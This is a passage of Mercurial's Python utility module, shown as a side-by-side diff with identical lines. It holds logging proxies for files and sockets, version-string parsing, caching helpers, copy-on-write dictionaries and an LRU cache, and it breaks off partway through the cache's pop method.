891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
891 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
892
892
893 self._writedata(res)
893 self._writedata(res)
894
894
895 def readinto(self, res, dest):
895 def readinto(self, res, dest):
896 if not self.reads:
896 if not self.reads:
897 return
897 return
898
898
899 if self.logdataapis:
899 if self.logdataapis:
900 self.fh.write(
900 self.fh.write(
901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
901 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
902 )
902 )
903
903
904 data = dest[0:res] if res is not None else b''
904 data = dest[0:res] if res is not None else b''
905
905
906 # _writedata() uses "in" operator and is confused by memoryview because
906 # _writedata() uses "in" operator and is confused by memoryview because
907 # characters are ints on Python 3.
907 # characters are ints on Python 3.
908 if isinstance(data, memoryview):
908 if isinstance(data, memoryview):
909 data = data.tobytes()
909 data = data.tobytes()
910
910
911 self._writedata(data)
911 self._writedata(data)
912
912
913 def write(self, res, data):
913 def write(self, res, data):
914 if not self.writes:
914 if not self.writes:
915 return
915 return
916
916
917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
917 # Python 2 returns None from some write() calls. Python 3 (reasonably)
918 # returns the integer bytes written.
918 # returns the integer bytes written.
919 if res is None and data:
919 if res is None and data:
920 res = len(data)
920 res = len(data)
921
921
922 if self.logdataapis:
922 if self.logdataapis:
923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
923 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
924
924
925 self._writedata(data)
925 self._writedata(data)
926
926
927 def flush(self, res):
927 def flush(self, res):
928 if not self.writes:
928 if not self.writes:
929 return
929 return
930
930
931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
931 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
932
932
933 # For observedbufferedinputpipe.
933 # For observedbufferedinputpipe.
934 def bufferedread(self, res, size):
934 def bufferedread(self, res, size):
935 if not self.reads:
935 if not self.reads:
936 return
936 return
937
937
938 if self.logdataapis:
938 if self.logdataapis:
939 self.fh.write(
939 self.fh.write(
940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
940 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
941 )
941 )
942
942
943 self._writedata(res)
943 self._writedata(res)
944
944
945 def bufferedreadline(self, res):
945 def bufferedreadline(self, res):
946 if not self.reads:
946 if not self.reads:
947 return
947 return
948
948
949 if self.logdataapis:
949 if self.logdataapis:
950 self.fh.write(
950 self.fh.write(
951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
951 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
952 )
952 )
953
953
954 self._writedata(res)
954 self._writedata(res)
955
955
956
956
957 def makeloggingfileobject(
957 def makeloggingfileobject(
958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
958 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
959 ):
959 ):
960 """Turn a file object into a logging file object."""
960 """Turn a file object into a logging file object."""
961
961
962 observer = fileobjectobserver(
962 observer = fileobjectobserver(
963 logh,
963 logh,
964 name,
964 name,
965 reads=reads,
965 reads=reads,
966 writes=writes,
966 writes=writes,
967 logdata=logdata,
967 logdata=logdata,
968 logdataapis=logdataapis,
968 logdataapis=logdataapis,
969 )
969 )
970 return fileobjectproxy(fh, observer)
970 return fileobjectproxy(fh, observer)
971
971
972
972
973 class socketobserver(baseproxyobserver):
973 class socketobserver(baseproxyobserver):
974 """Logs socket activity."""
974 """Logs socket activity."""
975
975
976 def __init__(
976 def __init__(
977 self,
977 self,
978 fh,
978 fh,
979 name,
979 name,
980 reads=True,
980 reads=True,
981 writes=True,
981 writes=True,
982 states=True,
982 states=True,
983 logdata=False,
983 logdata=False,
984 logdataapis=True,
984 logdataapis=True,
985 ):
985 ):
986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
986 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
987 self.reads = reads
987 self.reads = reads
988 self.writes = writes
988 self.writes = writes
989 self.states = states
989 self.states = states
990
990
991 def makefile(self, res, mode=None, bufsize=None):
991 def makefile(self, res, mode=None, bufsize=None):
992 if not self.states:
992 if not self.states:
993 return
993 return
994
994
995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
995 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
996
996
997 def recv(self, res, size, flags=0):
997 def recv(self, res, size, flags=0):
998 if not self.reads:
998 if not self.reads:
999 return
999 return
1000
1000
1001 if self.logdataapis:
1001 if self.logdataapis:
1002 self.fh.write(
1002 self.fh.write(
1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1003 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
1004 )
1004 )
1005 self._writedata(res)
1005 self._writedata(res)
1006
1006
1007 def recvfrom(self, res, size, flags=0):
1007 def recvfrom(self, res, size, flags=0):
1008 if not self.reads:
1008 if not self.reads:
1009 return
1009 return
1010
1010
1011 if self.logdataapis:
1011 if self.logdataapis:
1012 self.fh.write(
1012 self.fh.write(
1013 b'%s> recvfrom(%d, %d) -> %d'
1013 b'%s> recvfrom(%d, %d) -> %d'
1014 % (self.name, size, flags, len(res[0]))
1014 % (self.name, size, flags, len(res[0]))
1015 )
1015 )
1016
1016
1017 self._writedata(res[0])
1017 self._writedata(res[0])
1018
1018
1019 def recvfrom_into(self, res, buf, size, flags=0):
1019 def recvfrom_into(self, res, buf, size, flags=0):
1020 if not self.reads:
1020 if not self.reads:
1021 return
1021 return
1022
1022
1023 if self.logdataapis:
1023 if self.logdataapis:
1024 self.fh.write(
1024 self.fh.write(
1025 b'%s> recvfrom_into(%d, %d) -> %d'
1025 b'%s> recvfrom_into(%d, %d) -> %d'
1026 % (self.name, size, flags, res[0])
1026 % (self.name, size, flags, res[0])
1027 )
1027 )
1028
1028
1029 self._writedata(buf[0 : res[0]])
1029 self._writedata(buf[0 : res[0]])
1030
1030
1031 def recv_into(self, res, buf, size=0, flags=0):
1031 def recv_into(self, res, buf, size=0, flags=0):
1032 if not self.reads:
1032 if not self.reads:
1033 return
1033 return
1034
1034
1035 if self.logdataapis:
1035 if self.logdataapis:
1036 self.fh.write(
1036 self.fh.write(
1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1037 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1038 )
1038 )
1039
1039
1040 self._writedata(buf[0:res])
1040 self._writedata(buf[0:res])
1041
1041
1042 def send(self, res, data, flags=0):
1042 def send(self, res, data, flags=0):
1043 if not self.writes:
1043 if not self.writes:
1044 return
1044 return
1045
1045
1046 self.fh.write(
1046 self.fh.write(
1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1047 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1048 )
1048 )
1049 self._writedata(data)
1049 self._writedata(data)
1050
1050
1051 def sendall(self, res, data, flags=0):
1051 def sendall(self, res, data, flags=0):
1052 if not self.writes:
1052 if not self.writes:
1053 return
1053 return
1054
1054
1055 if self.logdataapis:
1055 if self.logdataapis:
1056 # Returns None on success. So don't bother reporting return value.
1056 # Returns None on success. So don't bother reporting return value.
1057 self.fh.write(
1057 self.fh.write(
1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1058 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1059 )
1059 )
1060
1060
1061 self._writedata(data)
1061 self._writedata(data)
1062
1062
1063 def sendto(self, res, data, flagsoraddress, address=None):
1063 def sendto(self, res, data, flagsoraddress, address=None):
1064 if not self.writes:
1064 if not self.writes:
1065 return
1065 return
1066
1066
1067 if address:
1067 if address:
1068 flags = flagsoraddress
1068 flags = flagsoraddress
1069 else:
1069 else:
1070 flags = 0
1070 flags = 0
1071
1071
1072 if self.logdataapis:
1072 if self.logdataapis:
1073 self.fh.write(
1073 self.fh.write(
1074 b'%s> sendto(%d, %d, %r) -> %d'
1074 b'%s> sendto(%d, %d, %r) -> %d'
1075 % (self.name, len(data), flags, address, res)
1075 % (self.name, len(data), flags, address, res)
1076 )
1076 )
1077
1077
1078 self._writedata(data)
1078 self._writedata(data)
1079
1079
1080 def setblocking(self, res, flag):
1080 def setblocking(self, res, flag):
1081 if not self.states:
1081 if not self.states:
1082 return
1082 return
1083
1083
1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1084 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1085
1085
1086 def settimeout(self, res, value):
1086 def settimeout(self, res, value):
1087 if not self.states:
1087 if not self.states:
1088 return
1088 return
1089
1089
1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1090 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1091
1091
1092 def gettimeout(self, res):
1092 def gettimeout(self, res):
1093 if not self.states:
1093 if not self.states:
1094 return
1094 return
1095
1095
1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1096 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1097
1097
1098 def setsockopt(self, res, level, optname, value):
1098 def setsockopt(self, res, level, optname, value):
1099 if not self.states:
1099 if not self.states:
1100 return
1100 return
1101
1101
1102 self.fh.write(
1102 self.fh.write(
1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1103 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1104 % (self.name, level, optname, value, res)
1104 % (self.name, level, optname, value, res)
1105 )
1105 )
1106
1106
1107
1107
1108 def makeloggingsocket(
1108 def makeloggingsocket(
1109 logh,
1109 logh,
1110 fh,
1110 fh,
1111 name,
1111 name,
1112 reads=True,
1112 reads=True,
1113 writes=True,
1113 writes=True,
1114 states=True,
1114 states=True,
1115 logdata=False,
1115 logdata=False,
1116 logdataapis=True,
1116 logdataapis=True,
1117 ):
1117 ):
1118 """Turn a socket into a logging socket."""
1118 """Turn a socket into a logging socket."""
1119
1119
1120 observer = socketobserver(
1120 observer = socketobserver(
1121 logh,
1121 logh,
1122 name,
1122 name,
1123 reads=reads,
1123 reads=reads,
1124 writes=writes,
1124 writes=writes,
1125 states=states,
1125 states=states,
1126 logdata=logdata,
1126 logdata=logdata,
1127 logdataapis=logdataapis,
1127 logdataapis=logdataapis,
1128 )
1128 )
1129 return socketproxy(fh, observer)
1129 return socketproxy(fh, observer)
1130
1130
1131
1131
1132 def version():
1132 def version():
1133 """Return version information if available."""
1133 """Return version information if available."""
1134 try:
1134 try:
1135 from . import __version__
1135 from . import __version__
1136
1136
1137 return __version__.version
1137 return __version__.version
1138 except ImportError:
1138 except ImportError:
1139 return b'unknown'
1139 return b'unknown'
1140
1140
1141
1141
1142 def versiontuple(v=None, n=4):
1142 def versiontuple(v=None, n=4):
1143 """Parses a Mercurial version string into an N-tuple.
1143 """Parses a Mercurial version string into an N-tuple.
1144
1144
1145 The version string to be parsed is specified with the ``v`` argument.
1145 The version string to be parsed is specified with the ``v`` argument.
1146 If it isn't defined, the current Mercurial version string will be parsed.
1146 If it isn't defined, the current Mercurial version string will be parsed.
1147
1147
1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1148 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1149 returned values:
1149 returned values:
1150
1150
1151 >>> v = b'3.6.1+190-df9b73d2d444'
1151 >>> v = b'3.6.1+190-df9b73d2d444'
1152 >>> versiontuple(v, 2)
1152 >>> versiontuple(v, 2)
1153 (3, 6)
1153 (3, 6)
1154 >>> versiontuple(v, 3)
1154 >>> versiontuple(v, 3)
1155 (3, 6, 1)
1155 (3, 6, 1)
1156 >>> versiontuple(v, 4)
1156 >>> versiontuple(v, 4)
1157 (3, 6, 1, '190-df9b73d2d444')
1157 (3, 6, 1, '190-df9b73d2d444')
1158
1158
1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1159 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1160 (3, 6, 1, '190-df9b73d2d444+20151118')
1161
1161
1162 >>> v = b'3.6'
1162 >>> v = b'3.6'
1163 >>> versiontuple(v, 2)
1163 >>> versiontuple(v, 2)
1164 (3, 6)
1164 (3, 6)
1165 >>> versiontuple(v, 3)
1165 >>> versiontuple(v, 3)
1166 (3, 6, None)
1166 (3, 6, None)
1167 >>> versiontuple(v, 4)
1167 >>> versiontuple(v, 4)
1168 (3, 6, None, None)
1168 (3, 6, None, None)
1169
1169
1170 >>> v = b'3.9-rc'
1170 >>> v = b'3.9-rc'
1171 >>> versiontuple(v, 2)
1171 >>> versiontuple(v, 2)
1172 (3, 9)
1172 (3, 9)
1173 >>> versiontuple(v, 3)
1173 >>> versiontuple(v, 3)
1174 (3, 9, None)
1174 (3, 9, None)
1175 >>> versiontuple(v, 4)
1175 >>> versiontuple(v, 4)
1176 (3, 9, None, 'rc')
1176 (3, 9, None, 'rc')
1177
1177
1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1178 >>> v = b'3.9-rc+2-02a8fea4289b'
1179 >>> versiontuple(v, 2)
1179 >>> versiontuple(v, 2)
1180 (3, 9)
1180 (3, 9)
1181 >>> versiontuple(v, 3)
1181 >>> versiontuple(v, 3)
1182 (3, 9, None)
1182 (3, 9, None)
1183 >>> versiontuple(v, 4)
1183 >>> versiontuple(v, 4)
1184 (3, 9, None, 'rc+2-02a8fea4289b')
1184 (3, 9, None, 'rc+2-02a8fea4289b')
1185
1185
1186 >>> versiontuple(b'4.6rc0')
1186 >>> versiontuple(b'4.6rc0')
1187 (4, 6, None, 'rc0')
1187 (4, 6, None, 'rc0')
1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1188 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1189 (4, 6, None, 'rc0+12-425d55e54f98')
1189 (4, 6, None, 'rc0+12-425d55e54f98')
1190 >>> versiontuple(b'.1.2.3')
1190 >>> versiontuple(b'.1.2.3')
1191 (None, None, None, '.1.2.3')
1191 (None, None, None, '.1.2.3')
1192 >>> versiontuple(b'12.34..5')
1192 >>> versiontuple(b'12.34..5')
1193 (12, 34, None, '..5')
1193 (12, 34, None, '..5')
1194 >>> versiontuple(b'1.2.3.4.5.6')
1194 >>> versiontuple(b'1.2.3.4.5.6')
1195 (1, 2, 3, '.4.5.6')
1195 (1, 2, 3, '.4.5.6')
1196 """
1196 """
1197 if not v:
1197 if not v:
1198 v = version()
1198 v = version()
1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1199 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1200 if not m:
1200 if not m:
1201 vparts, extra = b'', v
1201 vparts, extra = b'', v
1202 elif m.group(2):
1202 elif m.group(2):
1203 vparts, extra = m.groups()
1203 vparts, extra = m.groups()
1204 else:
1204 else:
1205 vparts, extra = m.group(1), None
1205 vparts, extra = m.group(1), None
1206
1206
1207 assert vparts is not None # help pytype
1207 assert vparts is not None # help pytype
1208
1208
1209 vints = []
1209 vints = []
1210 for i in vparts.split(b'.'):
1210 for i in vparts.split(b'.'):
1211 try:
1211 try:
1212 vints.append(int(i))
1212 vints.append(int(i))
1213 except ValueError:
1213 except ValueError:
1214 break
1214 break
1215 # (3, 6) -> (3, 6, None)
1215 # (3, 6) -> (3, 6, None)
1216 while len(vints) < 3:
1216 while len(vints) < 3:
1217 vints.append(None)
1217 vints.append(None)
1218
1218
1219 if n == 2:
1219 if n == 2:
1220 return (vints[0], vints[1])
1220 return (vints[0], vints[1])
1221 if n == 3:
1221 if n == 3:
1222 return (vints[0], vints[1], vints[2])
1222 return (vints[0], vints[1], vints[2])
1223 if n == 4:
1223 if n == 4:
1224 return (vints[0], vints[1], vints[2], extra)
1224 return (vints[0], vints[1], vints[2], extra)
1225
1225
1226
1226
1227 def cachefunc(func):
1227 def cachefunc(func):
1228 '''cache the result of function calls'''
1228 '''cache the result of function calls'''
1229 # XXX doesn't handle keywords args
1229 # XXX doesn't handle keywords args
1230 if func.__code__.co_argcount == 0:
1230 if func.__code__.co_argcount == 0:
1231 listcache = []
1231 listcache = []
1232
1232
1233 def f():
1233 def f():
1234 if len(listcache) == 0:
1234 if len(listcache) == 0:
1235 listcache.append(func())
1235 listcache.append(func())
1236 return listcache[0]
1236 return listcache[0]
1237
1237
1238 return f
1238 return f
1239 cache = {}
1239 cache = {}
1240 if func.__code__.co_argcount == 1:
1240 if func.__code__.co_argcount == 1:
1241 # we gain a small amount of time because
1241 # we gain a small amount of time because
1242 # we don't need to pack/unpack the list
1242 # we don't need to pack/unpack the list
1243 def f(arg):
1243 def f(arg):
1244 if arg not in cache:
1244 if arg not in cache:
1245 cache[arg] = func(arg)
1245 cache[arg] = func(arg)
1246 return cache[arg]
1246 return cache[arg]
1247
1247
1248 else:
1248 else:
1249
1249
1250 def f(*args):
1250 def f(*args):
1251 if args not in cache:
1251 if args not in cache:
1252 cache[args] = func(*args)
1252 cache[args] = func(*args)
1253 return cache[args]
1253 return cache[args]
1254
1254
1255 return f
1255 return f
1256
1256
1257
1257
1258 class cow(object):
1258 class cow(object):
1259 """helper class to make copy-on-write easier
1259 """helper class to make copy-on-write easier
1260
1260
1261 Call preparewrite before doing any writes.
1261 Call preparewrite before doing any writes.
1262 """
1262 """
1263
1263
1264 def preparewrite(self):
1264 def preparewrite(self):
1265 """call this before writes, return self or a copied new object"""
1265 """call this before writes, return self or a copied new object"""
1266 if getattr(self, '_copied', 0):
1266 if getattr(self, '_copied', 0):
1267 self._copied -= 1
1267 self._copied -= 1
1268 return self.__class__(self)
1268 return self.__class__(self)
1269 return self
1269 return self
1270
1270
1271 def copy(self):
1271 def copy(self):
1272 """always do a cheap copy"""
1272 """always do a cheap copy"""
1273 self._copied = getattr(self, '_copied', 0) + 1
1273 self._copied = getattr(self, '_copied', 0) + 1
1274 return self
1274 return self
1275
1275
1276
1276
1277 class sortdict(collections.OrderedDict):
1277 class sortdict(collections.OrderedDict):
1278 """a simple sorted dictionary
1278 """a simple sorted dictionary
1279
1279
1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1280 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1281 >>> d2 = d1.copy()
1281 >>> d2 = d1.copy()
1282 >>> d2
1282 >>> d2
1283 sortdict([('a', 0), ('b', 1)])
1283 sortdict([('a', 0), ('b', 1)])
1284 >>> d2.update([(b'a', 2)])
1284 >>> d2.update([(b'a', 2)])
1285 >>> list(d2.keys()) # should still be in last-set order
1285 >>> list(d2.keys()) # should still be in last-set order
1286 ['b', 'a']
1286 ['b', 'a']
1287 >>> d1.insert(1, b'a.5', 0.5)
1287 >>> d1.insert(1, b'a.5', 0.5)
1288 >>> d1
1288 >>> d1
1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1289 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1290 """
1290 """
1291
1291
1292 def __setitem__(self, key, value):
1292 def __setitem__(self, key, value):
1293 if key in self:
1293 if key in self:
1294 del self[key]
1294 del self[key]
1295 super(sortdict, self).__setitem__(key, value)
1295 super(sortdict, self).__setitem__(key, value)
1296
1296
1297 if pycompat.ispypy:
1297 if pycompat.ispypy:
1298 # __setitem__() isn't called as of PyPy 5.8.0
1298 # __setitem__() isn't called as of PyPy 5.8.0
1299 def update(self, src):
1299 def update(self, src):
1300 if isinstance(src, dict):
1300 if isinstance(src, dict):
1301 src = pycompat.iteritems(src)
1301 src = pycompat.iteritems(src)
1302 for k, v in src:
1302 for k, v in src:
1303 self[k] = v
1303 self[k] = v
1304
1304
1305 def insert(self, position, key, value):
1305 def insert(self, position, key, value):
1306 for (i, (k, v)) in enumerate(list(self.items())):
1306 for (i, (k, v)) in enumerate(list(self.items())):
1307 if i == position:
1307 if i == position:
1308 self[key] = value
1308 self[key] = value
1309 if i >= position:
1309 if i >= position:
1310 del self[k]
1310 del self[k]
1311 self[k] = v
1311 self[k] = v
1312
1312
1313
1313
1314 class cowdict(cow, dict):
1314 class cowdict(cow, dict):
1315 """copy-on-write dict
1315 """copy-on-write dict
1316
1316
1317 Be sure to call d = d.preparewrite() before writing to d.
1317 Be sure to call d = d.preparewrite() before writing to d.
1318
1318
1319 >>> a = cowdict()
1319 >>> a = cowdict()
1320 >>> a is a.preparewrite()
1320 >>> a is a.preparewrite()
1321 True
1321 True
1322 >>> b = a.copy()
1322 >>> b = a.copy()
1323 >>> b is a
1323 >>> b is a
1324 True
1324 True
1325 >>> c = b.copy()
1325 >>> c = b.copy()
1326 >>> c is a
1326 >>> c is a
1327 True
1327 True
1328 >>> a = a.preparewrite()
1328 >>> a = a.preparewrite()
1329 >>> b is a
1329 >>> b is a
1330 False
1330 False
1331 >>> a is a.preparewrite()
1331 >>> a is a.preparewrite()
1332 True
1332 True
1333 >>> c = c.preparewrite()
1333 >>> c = c.preparewrite()
1334 >>> b is c
1334 >>> b is c
1335 False
1335 False
1336 >>> b is b.preparewrite()
1336 >>> b is b.preparewrite()
1337 True
1337 True
1338 """
1338 """
1339
1339
1340
1340
1341 class cowsortdict(cow, sortdict):
1341 class cowsortdict(cow, sortdict):
1342 """copy-on-write sortdict
1342 """copy-on-write sortdict
1343
1343
1344 Be sure to call d = d.preparewrite() before writing to d.
1344 Be sure to call d = d.preparewrite() before writing to d.
1345 """
1345 """
1346
1346
1347
1347
1348 class transactional(object): # pytype: disable=ignored-metaclass
1348 class transactional(object): # pytype: disable=ignored-metaclass
1349 """Base class for making a transactional type into a context manager."""
1349 """Base class for making a transactional type into a context manager."""
1350
1350
1351 __metaclass__ = abc.ABCMeta
1351 __metaclass__ = abc.ABCMeta
1352
1352
1353 @abc.abstractmethod
1353 @abc.abstractmethod
1354 def close(self):
1354 def close(self):
1355 """Successfully closes the transaction."""
1355 """Successfully closes the transaction."""
1356
1356
1357 @abc.abstractmethod
1357 @abc.abstractmethod
1358 def release(self):
1358 def release(self):
1359 """Marks the end of the transaction.
1359 """Marks the end of the transaction.
1360
1360
1361 If the transaction has not been closed, it will be aborted.
1361 If the transaction has not been closed, it will be aborted.
1362 """
1362 """
1363
1363
1364 def __enter__(self):
1364 def __enter__(self):
1365 return self
1365 return self
1366
1366
1367 def __exit__(self, exc_type, exc_val, exc_tb):
1367 def __exit__(self, exc_type, exc_val, exc_tb):
1368 try:
1368 try:
1369 if exc_type is None:
1369 if exc_type is None:
1370 self.close()
1370 self.close()
1371 finally:
1371 finally:
1372 self.release()
1372 self.release()
1373
1373
1374
1374
1375 @contextlib.contextmanager
1375 @contextlib.contextmanager
1376 def acceptintervention(tr=None):
1376 def acceptintervention(tr=None):
1377 """A context manager that closes the transaction on InterventionRequired
1377 """A context manager that closes the transaction on InterventionRequired
1378
1378
1379 If no transaction was provided, this simply runs the body and returns
1379 If no transaction was provided, this simply runs the body and returns
1380 """
1380 """
1381 if not tr:
1381 if not tr:
1382 yield
1382 yield
1383 return
1383 return
1384 try:
1384 try:
1385 yield
1385 yield
1386 tr.close()
1386 tr.close()
1387 except error.InterventionRequired:
1387 except error.InterventionRequired:
1388 tr.close()
1388 tr.close()
1389 raise
1389 raise
1390 finally:
1390 finally:
1391 tr.release()
1391 tr.release()
1392
1392
1393
1393
1394 @contextlib.contextmanager
1394 @contextlib.contextmanager
1395 def nullcontextmanager(enter_result=None):
1395 def nullcontextmanager(enter_result=None):
1396 yield enter_result
1396 yield enter_result
1397
1397
1398
1398
1399 class _lrucachenode(object):
1399 class _lrucachenode(object):
1400 """A node in a doubly linked list.
1400 """A node in a doubly linked list.
1401
1401
1402 Holds a reference to nodes on either side as well as a key-value
1402 Holds a reference to nodes on either side as well as a key-value
1403 pair for the dictionary entry.
1403 pair for the dictionary entry.
1404 """
1404 """
1405
1405
1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1406 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1407
1407
1408 def __init__(self):
1408 def __init__(self):
1409 self.next = None
1409 self.next = None
1410 self.prev = None
1410 self.prev = None
1411
1411
1412 self.key = _notset
1412 self.key = _notset
1413 self.value = None
1413 self.value = None
1414 self.cost = 0
1414 self.cost = 0
1415
1415
1416 def markempty(self):
1416 def markempty(self):
1417 """Mark the node as emptied."""
1417 """Mark the node as emptied."""
1418 self.key = _notset
1418 self.key = _notset
1419 self.value = None
1419 self.value = None
1420 self.cost = 0
1420 self.cost = 0
1421
1421
1422
1422
1423 class lrucachedict(object):
1423 class lrucachedict(object):
1424 """Dict that caches most recent accesses and sets.
1424 """Dict that caches most recent accesses and sets.
1425
1425
1426 The dict consists of an actual backing dict - indexed by original
1426 The dict consists of an actual backing dict - indexed by original
1427 key - and a doubly linked circular list defining the order of entries in
1427 key - and a doubly linked circular list defining the order of entries in
1428 the cache.
1428 the cache.
1429
1429
1430 The head node is the newest entry in the cache. If the cache is full,
1430 The head node is the newest entry in the cache. If the cache is full,
1431 we recycle head.prev and make it the new head. Cache accesses result in
1431 we recycle head.prev and make it the new head. Cache accesses result in
1432 the node being moved to before the existing head and being marked as the
1432 the node being moved to before the existing head and being marked as the
1433 new head node.
1433 new head node.
1434
1434
1435 Items in the cache can be inserted with an optional "cost" value. This is
1435 Items in the cache can be inserted with an optional "cost" value. This is
1436 simply an integer that is specified by the caller. The cache can be queried
1436 simply an integer that is specified by the caller. The cache can be queried
1437 for the total cost of all items presently in the cache.
1437 for the total cost of all items presently in the cache.
1438
1438
1439 The cache can also define a maximum cost. If a cache insertion would
1439 The cache can also define a maximum cost. If a cache insertion would
1440 cause the total cost of the cache to go beyond the maximum cost limit,
1440 cause the total cost of the cache to go beyond the maximum cost limit,
1441 nodes will be evicted to make room for the new code. This can be used
1441 nodes will be evicted to make room for the new code. This can be used
1442 to e.g. set a max memory limit and associate an estimated bytes size
1442 to e.g. set a max memory limit and associate an estimated bytes size
1443 cost to each item in the cache. By default, no maximum cost is enforced.
1443 cost to each item in the cache. By default, no maximum cost is enforced.
1444 """
1444 """
1445
1445
1446 def __init__(self, max, maxcost=0):
1446 def __init__(self, max, maxcost=0):
1447 self._cache = {}
1447 self._cache = {}
1448
1448
1449 self._head = head = _lrucachenode()
1449 self._head = head = _lrucachenode()
1450 head.prev = head
1450 head.prev = head
1451 head.next = head
1451 head.next = head
1452 self._size = 1
1452 self._size = 1
1453 self.capacity = max
1453 self.capacity = max
1454 self.totalcost = 0
1454 self.totalcost = 0
1455 self.maxcost = maxcost
1455 self.maxcost = maxcost
1456
1456
1457 def __len__(self):
1457 def __len__(self):
1458 return len(self._cache)
1458 return len(self._cache)
1459
1459
1460 def __contains__(self, k):
1460 def __contains__(self, k):
1461 return k in self._cache
1461 return k in self._cache
1462
1462
1463 def __iter__(self):
1463 def __iter__(self):
1464 # We don't have to iterate in cache order, but why not.
1464 # We don't have to iterate in cache order, but why not.
1465 n = self._head
1465 n = self._head
1466 for i in range(len(self._cache)):
1466 for i in range(len(self._cache)):
1467 yield n.key
1467 yield n.key
1468 n = n.next
1468 n = n.next
1469
1469
1470 def __getitem__(self, k):
1470 def __getitem__(self, k):
1471 node = self._cache[k]
1471 node = self._cache[k]
1472 self._movetohead(node)
1472 self._movetohead(node)
1473 return node.value
1473 return node.value
1474
1474
1475 def insert(self, k, v, cost=0):
1475 def insert(self, k, v, cost=0):
1476 """Insert a new item in the cache with optional cost value."""
1476 """Insert a new item in the cache with optional cost value."""
1477 node = self._cache.get(k)
1477 node = self._cache.get(k)
1478 # Replace existing value and mark as newest.
1478 # Replace existing value and mark as newest.
1479 if node is not None:
1479 if node is not None:
1480 self.totalcost -= node.cost
1480 self.totalcost -= node.cost
1481 node.value = v
1481 node.value = v
1482 node.cost = cost
1482 node.cost = cost
1483 self.totalcost += cost
1483 self.totalcost += cost
1484 self._movetohead(node)
1484 self._movetohead(node)
1485
1485
1486 if self.maxcost:
1486 if self.maxcost:
1487 self._enforcecostlimit()
1487 self._enforcecostlimit()
1488
1488
1489 return
1489 return
1490
1490
1491 if self._size < self.capacity:
1491 if self._size < self.capacity:
1492 node = self._addcapacity()
1492 node = self._addcapacity()
1493 else:
1493 else:
1494 # Grab the last/oldest item.
1494 # Grab the last/oldest item.
1495 node = self._head.prev
1495 node = self._head.prev
1496
1496
1497 # At capacity. Kill the old entry.
1497 # At capacity. Kill the old entry.
1498 if node.key is not _notset:
1498 if node.key is not _notset:
1499 self.totalcost -= node.cost
1499 self.totalcost -= node.cost
1500 del self._cache[node.key]
1500 del self._cache[node.key]
1501
1501
1502 node.key = k
1502 node.key = k
1503 node.value = v
1503 node.value = v
1504 node.cost = cost
1504 node.cost = cost
1505 self.totalcost += cost
1505 self.totalcost += cost
1506 self._cache[k] = node
1506 self._cache[k] = node
1507 # And mark it as newest entry. No need to adjust order since it
1507 # And mark it as newest entry. No need to adjust order since it
1508 # is already self._head.prev.
1508 # is already self._head.prev.
1509 self._head = node
1509 self._head = node
1510
1510
1511 if self.maxcost:
1511 if self.maxcost:
1512 self._enforcecostlimit()
1512 self._enforcecostlimit()
1513
1513
1514 def __setitem__(self, k, v):
1514 def __setitem__(self, k, v):
1515 self.insert(k, v)
1515 self.insert(k, v)
1516
1516
1517 def __delitem__(self, k):
1517 def __delitem__(self, k):
1518 self.pop(k)
1518 self.pop(k)
1519
1519
1520 def pop(self, k, default=_notset):
1520 def pop(self, k, default=_notset):
1521 try:
1521 try:
1522 node = self._cache.pop(k)
1522 node = self._cache.pop(k)
1523 except KeyError:
1523 except KeyError:
1524 if default is _notset:
1524 if default is _notset:
1525 raise
1525 raise
1526 return default
1526 return default
1527
1527
1528 assert node is not None # help pytype
1528 assert node is not None # help pytype
1529 value = node.value
1529 value = node.value
1530 self.totalcost -= node.cost
